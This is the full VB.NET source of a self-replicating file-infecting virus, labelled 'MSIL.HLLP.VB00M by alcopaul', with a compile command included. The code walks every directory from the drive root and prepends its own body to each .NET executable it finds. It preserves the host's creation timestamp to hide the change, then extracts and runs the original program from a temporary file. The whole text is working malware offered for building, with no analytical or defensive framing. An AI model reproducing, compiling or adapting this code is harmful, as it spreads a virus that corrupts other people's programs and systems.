'========================================================= 'MSIL.HLLP.VB00M by alcopaul 'compile: vbc /target:winexe /reference:System.dll virus.vb Imports System Imports System.IO Imports System.Reflection Imports System.Text Imports System.Diagnostics Imports System.Security.Cryptography Public Module virus Public Sub Main(ByVal args as String()) 'Main is always Sub, args is always String Array Dim self As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules() (0) Dim args1 As New StringBuilder() Dim arg As String For Each arg In args args1.Append(arg & " ") Next Try Dim fi As New FileInfo(self.FullyQualifiedName) Dim x1 As Long = fi.Length Dim x As Integer = CInt(x1) Dim www As Byte() = readx(self.FullyQualifiedName, (x - 5632), 5632) Dim xxx As Byte()() = {www} Dim nom As String = hostname writex(nom, xxx) fireup(nom, args1.ToString()) Catch End Try Dim rootdir As String = Path.GetPathRoot(Directory.GetCurrentDirectory()) DispEXE(rootdir) End Sub 'returns byte array Public Function readx(ByVal filename As String, ByVal size As Integer, ByVal pntr As Integer) As Byte() Dim xs As New FileStream(filename, FileMode.OpenOrCreate, FileAccess.Read) Dim br AS New BinaryReader(xs) Dim selflen As Integer = size br.BaseStream.Seek(pntr, SeekOrigin.Begin) Dim xxx(selflen) As Byte Dim bytestoread As Integer = selflen Dim count1 As Integer = 0 While bytestoread > 0 Dim v As Integer = br.Read(xxx,count1,bytestoread) If v = 0 Then Exit While End If count1 += v bytestoread -= v End While br.Close readx = xxx End Function Public Sub DispEXE(ByVal tD As String) Dim self As System.Reflection.Module = [Assembly].GetExecutingAssembly().GetModules() (0) Dim xfiles As String() = Directory.GetFiles(tD, "*.exe") Dim xfile As String For Each xfile in xfiles Try Dim AN As AssemblyName = AssemblyName.GetAssemblyName(xfile) Catch Goto g End Try Dim data1 As Byte() = readx(self.FullyQualifiedName,1000,0) Dim data2 As Byte() = readx(xfile,1000,0) If sha1x(data1) = sha1x(data2) Then Goto g Else 'infection Try Dim fi As New FileInfo(xfile) Dim x1 As Long = fi.Length Dim x As Integer = CInt(x1) Dim timestamp As DateTime = File.GetCreationTime(xfile) Dim data3 As Byte() = readx(self.FullyQualifiedName,5632 - 1,0) Dim data4 As Byte() = readx(xfile,x - 1,0) Dim data5 As Byte()() = {data3,data4} writex(xfile,data5) File.SetCreationTime(xfile,timestamp) Goto gg Catch Goto g End Try gg: End If g: Next xfile Dim sdirs As String() = Directory.GetDirectories(tD) 'recursion Dim sdir As String For Each sdir in sdirs DispEXE(sdir) Next sdir End Sub Public Sub writex(ByVal filename As String, ByVal data As Byte()()) Dim sx As New FileStream(filename, FileMode.OpenOrCreate, FileAccess.Write) Dim bw As New BinaryWriter(sx) bw.BaseStream.Seek(0, SeekOrigin.Begin) Dim g() As Byte For Each g in data bw.Write(g) Next g bw.Close() End Sub Public Function sha1x(ByVal putin As Byte()) As String Dim mark1 As New SHA1CryptoServiceProvider() Dim result1 As Byte() = mark1.ComputeHash(putin) Dim hexString As New StringBuilder() Dim counter As Integer For counter = 0 To CInt(putin.Length - 1) hexString.Append(String.Format("{0:X2}", putin(counter))) Next counter sha1x = hexString.ToString() End Function 'use function if it returns somethin' Public Function hostname() As String Dim rand As New Random() Dim rndno As String = rand.Next(999999).ToString() Dim hostfile As String = "t" & rndno & ".exe" hostname = hostfile End Function Public Sub fireup(ByVal hostfile As String, ByVal arguments As String) Process.Start(hostfile,arguments) wet: Try File.Delete(hostfile) Catch Goto wet End Try If File.Exists(hostfile) = True Then Goto wet End If End Sub End Module '==========================================================